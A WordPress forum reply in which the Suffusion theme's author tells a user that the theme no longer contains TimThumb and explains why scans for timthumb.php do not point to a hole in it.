Viewing 1 replies (of 1 total)
  • Theme Author Sayontan Sinha

    (@sayontan)

    Suffusion doesn’t have TimThumb. You can verify the source code from the official WP repository: http://themes.svn.ww.wp.xz.cn/suffusion/4.4.4/. The last version of Suffusion to have TimThumb was 3.7.1, which was almost 2 years back. In fact, I took TimThumb out of Suffusion 6 months before the TimThumb vulnerability was discovered.

    Attackers try thousands of random strings in the hopes of injecting malicious code, but rest assured that TimThumb is not a part of the Suffusion code. Moreover, every theme distributed through http://ww.wp.xz.cn/extend/themes/ goes through a review, and TimThumb is not allowed in your code. So there is no theme on this site that has TimThumb in it.


The topic ‘Security Issue : timthumb.php’ is closed to new replies.